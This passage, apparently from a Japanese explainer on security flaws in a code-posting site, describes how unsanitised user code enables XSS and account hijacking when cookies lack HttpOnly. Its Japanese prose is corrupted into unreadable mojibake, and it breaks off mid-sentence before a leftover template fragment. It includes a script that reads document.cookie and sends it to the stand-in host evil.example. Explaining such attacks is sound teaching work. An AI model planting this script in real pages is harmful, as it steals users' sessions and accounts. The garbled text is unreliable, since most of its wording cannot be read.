åé¡1: ä»ã¦ã¼ã¶ã¼ã®èªè¨¼æ å ±ã«ã¢ã¯ã»ã¹ã§ãã¦ãã¾ã æç¨¿ãããã³ã¼ããæ®éã«ãµã¤ãå ã«åãè¾¼ãã¨XSSãããæ¾é¡ãªç¶æ ã«ãªãã¾ãã èªè¨¼Cookieã®HttpOnlyãç¡å¹ã«ãªã£ã¦ããå ´å ã¦ã¼ã¶ã¼ãããããéã¾ãè¶ é¢ç½ãã²ã¼ã ãä½ãããã®ä¸ã«ä»¥ä¸ã®ãããªã³ã¼ããããã£ã¨å«ããã¨ããã®ã²ã¼ã ãéããã¦ã¼ã¶ã¼ã®ã¢ã«ã¦ã³ãã®ä¹ã£åããå¯è½ã«ãªãã¾ãã <script> // 1. Cookieãåå¾ const stolen = document.cookie; // 2. æ»æè ã®ãµã¼ãã¼ã«éä¿¡ const img = new Image(); img.src = "https://evil.example/steal?cookie=" + encodeURIComponent(stolen); </script> Cookieã®HttpOnly屿§ãç¡å¹ã«ãªã£ã¦ããã¨ãã¹ã¯ãªããããCo


{{#tags}}- {{label}}
{{/tags}}